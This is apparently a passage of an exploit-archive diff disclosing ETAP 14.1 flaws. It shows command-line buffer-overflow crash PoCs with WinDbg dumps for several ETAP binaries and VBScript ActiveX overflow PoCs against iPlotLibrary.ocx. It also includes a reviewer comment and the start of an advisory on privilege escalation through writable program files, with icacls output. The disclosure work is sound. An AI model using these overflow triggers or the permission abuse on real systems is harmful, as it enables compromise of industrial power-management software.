C:\ETAP 1410>ra.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\ra.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\ra.exe -
eax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000
eip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ra!CFileMap::operator=+0x786:
00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341
0:000> !exchain
0018ff3c: ra!CFileMap::GetLength+7b21 (00410041)
Invalid exception stack at 00410041
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786
0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f
0018ff48 00410041 00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2
0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff7c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
..
0:000> d esi
005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . .
005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
===============================
C:\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STATUS_STACK_BUFFER_OVERRUN encountered
(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SFA.exe -
kernel32!GetProfileStringW+0x12cc9:
75150265 cc int 3
===============================
C:\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STATUS_STACK_BUFFER_OVERRUN encountered
(380c.3cc4): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
*** WARNING: Unable to verify checksum for SO3Ph.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe -
kernel32!UnhandledExceptionFilter+0x71:
00000000`76fcb8c1 cc int 3
0:000> r
rax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000
rdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002
rip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=00000000000fe310 r12=0000000140086150 r13=0000000000000000
r14=000000000012eb00 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
kernel32!UnhandledExceptionFilter+0x71:
00000000`76fcb8c1 cc int 3
===============================
C:\ETAP 1410>TDULF.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(36bc.36b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\LF3PHDLL.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\LF3PHDLL.dll -
kernel32!lstrcpyW+0xa:
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
0:000> r
rax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000
rdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0
rip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000
r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
r14=000000000000000a r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
kernel32!lstrcpyW+0xa:
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
0:000> d rax
00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
...
0:000> r
rax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff
rdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1
rip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000
r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
r14=000000000000000a r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
KERNELBASE!lstrlenW+0x17:
000007fe`fd0a17c7 66f2af repne scas word ptr [rdi]
===============================
COM/ActiveX PoCs:
-----------------
<html>
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
prototype = "Property Let Name As String"
memberName = "Name"
progid = "iPlotLibrary.iPlotDataCursorX"
argCount = 1
arg1=String(1000, "A")
target.Name = arg1
</script>
</html>
(2750.243c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\OLEAUT32.dll -
eax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684
eip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
iPlotLibrary!DllUnregisterServer+0x104e5a:
0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=????????
0:000> d edx
02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
===============================
<html>
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
prototype = "Property Let MenuItemCaptionValueY As String"
memberName = "MenuItemCaptionValueY"
progid = "iPlotLibrary.iPlotDataCursorX"
argCount = 1
arg1=String(1044, "A")
target.MenuItemCaptionValueY = arg1
</script>
</html>
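Review bot: The second COM/ActiveX PoC (`MenuItemCaptionValueY`, `String(1044, "A")`) has no debugger output after it, and the register dump ending at `KERNELBASE!lstrlenW+0x17` follows the `...` with no command line or exception line, so neither can be tied to a specific fault. Label each trace with the binary and the exception record it belongs to. The one ActiveX trace that is shown faults on `mov eax,dword ptr [ebx+4]` with `ebx=00000000`, which is a read through a null pointer rather than direct evidence of the stack buffer overrun named in the commit's entry title, so state which condition each PoC demonstrates. A short mitigation line for the control (`clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224`), such as setting its kill bit, would also help readers who have ETAP deployed.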

481
platforms/windows/local/39845.txt Executable file

@ -0,0 +1,481 @@

Operation Technology ETAP 14.1.0 Local Privilege Escalation
Vendor: Operation Technology, Inc.
Product web page: http://www.etap.com
Affected version: 14.1.0.0
Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
is the most comprehensive electrical engineering software platform for the
design, simulation, operation, and automation of generation, transmission,
distribution, and industrial systems. As a fully integrated model-driven
enterprise solution, ETAP extends from modeling to operation to offer a
Real-Time Power Management System.
Desc: ETAP suffers from an elevation of privileges vulnerability which can
be used by a simple authenticated user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'C' flag (Change) for 'Authenticated Users' group.
Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
Microsoft Windows 7 Ultimate SP1 (EN) x86_64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5323
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5323.php
07.04.2016
--
C:\>icacls "ETAP 1410"
ETAP 1410 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
C:\ETAP 1410>icacls etaps64.exe
etaps64.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
Affected binaries:
------------------
C:\ETAP 1410>dir
Volume in drive C is Windows
Volume Serial Number is 56F3-8688
Directory of C:\ETAP 1410
07/04/2016 11:42 <DIR> .
07/04/2016 11:42 <DIR> ..
01/02/2016 11:14 766 16COLOR.CUR
19/01/2016 02:36 238,592 acsdvd.exe
19/01/2016 02:34 81,920 bifact.dll
19/01/2016 02:36 7,980,032 ca.exe
26/02/2016 16:56 1,220,608 cddll64.dll
19/01/2016 01:48 14,848 ComtradeReader.dll
17/11/2015 17:54 66,982 configdescriptions.xml
01/02/2016 11:14 1,620 ContourSetting.ini
07/04/2016 11:41 <DIR> Convert
19/01/2016 02:35 212,992 csdvd.exe
01/02/2016 11:14 27,136 ctl3d32.dll
19/01/2016 02:28 112,128 ctrlpb.exe
27/06/2013 15:17 7,582 Currency.xml
05/03/2009 12:44 65,536 dao.dll
07/04/2016 11:41 <DIR> Datablocks
26/02/2016 16:35 13,256,192 DATADB.dll
26/02/2016 16:51 19,252,736 datadb64.dll
10/08/2015 13:00 2,011,136 DBCompareInstr.mdb
10/08/2015 13:01 151,552 dbcompareinstr.sdf
08/10/2010 13:20 503,808 DBCompareOutput.mdb
05/11/2014 14:45 86,016 DBCompareOutput.sdf
08/10/2010 13:20 503,808 DBCompareSummary.mdb
05/11/2014 14:45 28,672 DBCompareSummary.sdf
19/01/2016 02:31 53,248 DBExtractConsoleApp.exe
19/01/2016 02:35 896,000 dccalc.exe
26/02/2016 16:54 352,256 dcspdt64.dll
26/02/2016 16:55 348,160 dcspst64.dll
01/02/2016 11:14 229,376 defaultA.mdb
01/02/2016 11:14 20,971,520 defaulte.mdb
01/02/2016 11:14 17,657,856 defaultm.mdb
01/02/2016 11:14 143,360 dunzip32.dll
01/02/2016 11:14 176,128 dzip32.dll
01/02/2016 11:14 3,262 e-dpp2.ico
01/02/2016 11:14 260,942 Electronic License Grant Terms.pdf
01/02/2016 11:14 315,392 enable40.dll
09/02/2016 17:38 137,728 enginemsgs.dll
19/01/2016 02:34 147,456 enginemsgs64.dll
19/01/2016 02:31 253,952 et2waydataxexcel.exe
19/01/2016 02:31 135,168 etaccess.exe
26/02/2016 16:52 3,872,768 ETAnalyzers64.dll
01/02/2016 11:14 76,999 etap.ico
25/03/2001 10:56 246,434 etap2csv.exe
19/01/2016 02:31 54,784 etapcim.dll
19/01/2016 02:31 1,174,528 EtapDevices.DLL
19/01/2016 02:31 67,072 EtapGISDevices.dll
19/01/2016 02:31 14,336 ETAPMongoDB.dll
26/02/2016 16:24 1,325,568 Etapmsgs.dll
26/02/2016 16:38 1,335,296 etapmsgs64.dll
05/02/2016 17:04 49,012,284 etaps.chm
07/04/2016 11:45 660 ETAPS.INI
09/12/2003 12:13 88 etaps.pek
26/02/2016 17:23 86,749,184 etaps64.exe
22/06/2011 17:40 6,130 ETAPS64.exe.config
26/02/2016 16:29 23,688,704 etapsdb.dll
26/02/2016 16:45 26,805,248 etapsdb64.dll
19/01/2016 02:31 125,440 EtapSmartPlant.exe
26/06/2015 12:51 24,571,904 etapsqlenglishmodel.bak
26/06/2015 12:52 24,436,736 etapsqlmetricmodel.bak
19/01/2016 02:31 52,736 ETAP_CIM.EXE
01/02/2016 11:14 6,184 etap_dy_.ttf
19/01/2016 02:31 94,208 etap_edpp.exe
19/01/2016 02:31 20,480 ETAP_GlobalUtilities.dll
19/01/2016 02:31 32,768 ETAP_Graphics.dll
24/06/2015 08:40 9,977,953 etap_overview.pdf
26/02/2016 16:27 44,032 EtArcFlash.dll
26/02/2016 16:44 51,712 EtArcFlash64.dll
19/01/2016 02:31 192,512 etarcgis.exe
19/01/2016 02:31 192,512 etarcgis92.exe
19/01/2016 02:31 192,512 etarcgis93.exe
19/01/2016 02:31 427,520 ETArcGIS_TD.exe
19/01/2016 02:31 428,544 ETArcGIS_TD10.exe
26/02/2016 16:54 417,792 etbatt64.dll
26/02/2016 16:52 614,912 ETBranch64.dll
26/02/2016 16:26 1,353,728 etcabp.exe
26/02/2016 16:53 4,139,008 etcb64.dll
26/02/2016 16:54 1,220,096 etcharg64.dll
19/01/2016 02:28 307,712 ETConfig.EXE
14/09/2015 08:44 287 ETConfig.exe.config
19/01/2016 02:34 68,096 etcp.exe
19/01/2016 02:31 225,280 etdatamapper.dll
19/01/2016 02:31 172,032 etdataxexcel.exe
26/02/2016 16:54 3,728,384 etdc64.dll
26/02/2016 16:54 433,152 etdcbus64.dll
26/02/2016 16:54 768,512 etdccb64.dll
26/02/2016 16:54 970,752 etdced64.dll
26/02/2016 16:54 406,528 etdcfuse64.dll
26/02/2016 16:54 334,336 etdcimp64.dll
26/02/2016 16:54 367,104 etdcknvt64.dll
26/02/2016 16:54 448,512 etdclmp64.dll
26/02/2016 16:55 1,019,904 etdcmach64.dll
26/02/2016 16:54 422,912 etdcstl64.dll
19/01/2016 02:31 1,228,800 etdevices.dll
19/01/2016 02:40 150,528 ETDistanceRelay64.dll
19/01/2016 02:31 135,168 ETDXF.exe
26/02/2016 16:38 633,344 ETEAView.exe
01/02/2016 11:14 3,771 ETEAView.exe.config
19/01/2016 02:31 651,776 ETEZPowerImport.dll
19/01/2016 02:31 8,192 ETFilter.exe
19/01/2016 02:31 102,400 etglu.dll
19/01/2016 02:31 89,088 etglu64.dll
19/01/2016 02:34 168,448 etgrd.exe
26/02/2016 16:56 704,000 ethf64.dll
26/02/2016 16:26 285,184 ETInterchange.exe
01/02/2016 11:14 3,688 ETInterchange.exe.config
26/02/2016 16:55 1,471,488 etinvert64.dll
26/02/2016 16:52 231,936 etlayout64.dll
26/02/2016 16:44 187,392 etlncalc64.dll
26/02/2016 16:56 9,623,552 etload64.dll
19/01/2016 02:31 414,720 ETMergeSync.exe
19/01/2016 02:28 1,081,344 EtMongoUnmanaged.DLL
26/02/2016 16:52 292,352 etmtrupd64.dll
19/01/2016 02:31 51,712 ETMultispeak.exe
19/01/2016 02:31 73,728 ETPanelRep.exe
14/09/2015 08:44 3,262 etpanelrep.ico
26/02/2016 16:52 918,016 etpe64.dll
26/02/2016 16:45 107,008 ETPlugIn64.dll
26/02/2016 16:25 42,496 ETPMStatus.EXE
01/02/2016 11:14 626 ETPMStatus.exe.config
26/02/2016 16:52 776,192 etprofile64.dll
19/01/2016 02:28 94,208 etpsmsexcel.exe
01/02/2016 11:14 2,032 EtPSMSExcel.exe.config
19/01/2016 02:31 126,976 etrawdata.exe
26/02/2016 16:52 389,632 etreac64.dll
26/02/2016 16:27 4,935,680 etrep.dll
26/02/2016 16:43 6,328,320 etrep64.dll
19/01/2016 02:31 32,768 ETRepAnalyzer.exe
19/01/2016 02:32 496,128 ETSkmParser.dll
26/02/2016 16:36 5,586,432 EtStudyCase.dll
26/02/2016 16:53 7,607,296 EtStudyCase64.dll
26/02/2016 16:53 2,739,200 ETTrack64.dll
26/02/2016 16:26 1,235,968 ettrend.exe
01/02/2016 11:14 4,348 EtTrend.exe.config
26/02/2016 16:25 20,480 ettrenddata.dll
26/02/2016 16:55 1,253,888 etups64.dll
26/02/2016 16:55 1,185,792 etvfd64.dll
19/01/2016 02:31 90,112 ET_CATIA.exe
19/01/2016 02:31 45,056 et_ieee.exe
07/04/2016 11:44 <DIR> Example-ANSI
07/04/2016 11:41 <DIR> Example-IEC
07/04/2016 11:41 <DIR> Example-New
07/04/2016 11:41 <DIR> ExcelTemplates
01/02/2016 11:14 433,230 filter.xml
01/02/2016 11:14 566 filterall.xml
03/04/2015 12:50 197,074 FilterDXF.xml
08/10/2010 13:20 99,171 FilterOpenExcel.xml
07/04/2016 11:41 <DIR> Filters
01/02/2016 11:14 33,363 FilterSync.xml
19/01/2016 02:34 102,912 fludbl.dll
07/04/2016 11:42 <DIR> Formats1400
07/04/2016 11:42 <DIR> Formats1410
19/01/2016 02:34 9,728 gasolve.dll
04/05/2004 10:53 1,645,320 gdiplus.dll
26/02/2016 16:25 115,712 grddata.dll
26/02/2016 16:25 245,248 grdrep.dll
19/01/2016 02:34 9,050,112 harmonic.exe
04/11/2004 08:54 471,040 HHActiveX.dll
26/02/2016 16:25 443,904 ILSEngine.dll
26/02/2016 16:38 560,128 ilsengine64.dll
26/02/2016 16:25 81,920 ilsutils.dll
26/02/2016 16:38 77,824 ILSUtils64.dll
01/02/2016 11:14 12,170 ILS_Report_Logo.jpg
01/02/2016 11:14 26,383 ils_snapshot_stylesheet.xsl
01/02/2016 11:14 45,056 ImageComboBox.dll
01/02/2016 11:14 148,488 Infragistics.Shared.v2.dll
01/02/2016 11:14 147,456 Infragistics.Shared.v3.dll
01/02/2016 11:14 1,074,208 Infragistics.Win.UltraWinGrid.v2.dll
01/02/2016 11:14 1,241,088 Infragistics.Win.UltraWinGrid.v3.dll
01/02/2016 11:14 914,456 Infragistics.Win.v2.dll
01/02/2016 11:14 1,236,992 Infragistics.Win.v3.dll
05/03/2009 12:44 65,536 Interop.DAO.dll
01/02/2016 11:14 1,089,536 Interop.Excel.dll
01/02/2016 11:14 217,088 interop.Microsoft.Office.Core.dll
03/08/2004 23:56 69,632 interop.msxml.dll
05/03/2009 12:44 11,776 interop.stdtype.dll
24/01/2011 04:54 57,344 Interop.VBIDE.dll
19/01/2016 02:36 1,227,264 LA3PH.exe
19/01/2016 02:37 4,359,680 LF3PH.exe
19/01/2016 02:36 4,397,568 LF3PHDLL.dll
19/01/2016 02:35 6,849,536 lffd.exe
19/01/2016 02:36 6,247,936 lfgs.exe
19/01/2016 02:35 6,390,272 lfle.exe
19/01/2016 02:37 7,419,904 lfnr.exe
07/04/2016 11:41 <DIR> lib
26/02/2016 16:36 1,601,536 libacc.dll
26/02/2016 16:52 2,033,152 libacc64.dll
26/02/2016 16:34 29,691,392 libsdll.dll
26/02/2016 16:50 35,940,864 libsdll64.dll
19/01/2016 01:49 102,400 lineq.dll
09/02/2016 17:53 122,368 LinEq64.dll
26/02/2016 16:24 1,609,216 locetaps.dll
26/02/2016 16:38 1,701,888 locetaps64.dll
26/02/2016 16:24 133,632 locetcom.dll
26/02/2016 16:38 143,872 locetcom64.dll
01/02/2016 11:14 327,556 Logo.png
26/02/2016 16:25 105,984 MDBCompare.exe
01/02/2016 11:14 149 MDBCompare.exe.config
26/02/2016 16:24 20,480 MDBCompareHelper.dll
07/12/1999 04:00 995,383 mfc42.dll
26/02/2016 11:48 7,208,960 mfclog.dll
26/02/2016 12:01 2,949,120 mfclogb.dll
26/02/2016 11:57 4,390,912 mfcloge.dll
16/02/2016 15:41 8,716,288 mfclogl.dll
26/02/2016 11:48 29,425,664 mfcmdb.dll
26/02/2016 12:01 26,279,936 mfcmdbb.dll
26/02/2016 11:57 28,377,088 mfcmdbe.dll
16/02/2016 15:41 29,425,664 mfcmdbl.dll
05/10/2013 01:38 23,720 MFCMIFC80.DLL
26/02/2016 11:48 10,240 mfcoti.dll
26/02/2016 12:01 10,240 mfcotib.dll
26/02/2016 11:57 10,240 mfcotie.dll
16/02/2016 15:41 10,240 mfcotil.dll
26/09/2013 17:12 331,776 MFCPB.DLL
26/02/2016 11:42 29,853,696 mfcpso.dll
26/08/2015 15:54 1,536 mfcpsob.dll
01/10/2015 08:36 22,067,712 mfcpsoe.dll
26/08/2015 16:40 22,182,912 mfcpsol.dll
01/02/2016 11:14 1,100,392 Microsoft.Office.Interop.Excel.dll
01/02/2016 11:14 781,104 Microsoft.Office.Interop.Word.dll
01/02/2016 11:14 161,192 Microsoft.Practices.EnterpriseLibrary.Common.dl
01/02/2016 11:14 91,560 Microsoft.Practices.EnterpriseLibrary.Data.dll
01/02/2016 11:14 42,408 Microsoft.Practices.EnterpriseLibrary.Logging.D
01/02/2016 11:14 218,536 Microsoft.Practices.EnterpriseLibrary.Logging.d
01/02/2016 11:14 64,352 Microsoft.Practices.ObjectBuilder.dll
01/02/2016 11:14 64,088 Microsoft.Vbe.Interop.dll
01/02/2016 11:14 379,392 MongoDB.Bson.dll
01/02/2016 11:14 559,104 MongoDB.Driver.dll
19/01/2016 02:37 7,927,808 ms.exe
18/08/2001 04:00 1,388,544 msvbvm60.dll
29/08/2000 00:00 401,462 Msvcp60.dll
04/05/2001 11:05 290,869 MSVCRT.DLL
07/12/1999 04:00 253,952 msvcrt20.dll
07/12/1999 04:00 65,024 msvcrt40.dll
19/01/2016 02:36 6,827,008 OCP.exe
01/02/2016 11:14 223,800 Office.dll
01/02/2016 11:14 2,429 olhtypicalcurves.xml
01/02/2016 11:14 6,335 OnlineToolbar.xaml
01/02/2016 11:14 96,256 Opc.Ua.Client.dll
19/01/2016 02:28 167,936 Opc.Ua.ClientControls.dll
01/02/2016 11:14 102,400 Opc.Ua.Configuration.dll
01/02/2016 11:14 91,564 Opc.Ua.Configuration.xml
01/02/2016 11:14 2,970,624 Opc.Ua.Core.dll
01/02/2016 11:14 5,606,536 Opc.Ua.Core.xml
19/01/2016 02:29 112,128 OPCEPICS.exe
19/01/2016 02:36 6,549,504 opf.exe
07/04/2016 11:41 <DIR> Other
19/01/2016 02:28 336,896 Oti.UAToolkit.dll
26/02/2016 16:38 108,544 otiAGCView.dll
26/02/2016 16:25 132,096 otibin.dll
26/02/2016 16:24 106,496 oticommon.dll
26/02/2016 16:38 102,400 oticommon64.dll
26/02/2016 16:38 77,824 oticonfig.dll
26/02/2016 16:38 9,728 oticonfig.xmlserializers.dll
26/02/2016 16:38 167,936 OTIContingency.dll
24/11/2015 18:54 121,344 OtiContourConfig.exe
26/02/2016 16:28 263,680 OtiDistanceRelay.dll
26/02/2016 16:44 263,168 OtiDistanceRelay64.dll
26/02/2016 16:55 1,660,928 OtiDistribDataManager64.dll
26/02/2016 16:44 84,992 OTIDistribution.dll
26/02/2016 16:26 124,928 OTIEA.DLL
26/02/2016 16:38 8,704 OtiEmfToXaml.exe
26/02/2016 16:38 17,920 OtiExcelReport.dll
26/02/2016 17:22 4,165,632 otigraph.dll
26/02/2016 16:38 161,280 otigraph.xmlserializers.dll
26/02/2016 16:28 634,368 OtiGridView.dll
26/02/2016 16:43 638,976 OtiGridView64.dll
26/02/2016 16:25 613,888 OtiInterchange.dll
26/02/2016 16:25 36,864 OtiInterchange.XMLSerializers.DLL
26/02/2016 16:38 613,376 OtiInterchange64.dll
19/01/2016 02:31 183,296 OTIKmlToGis.exe
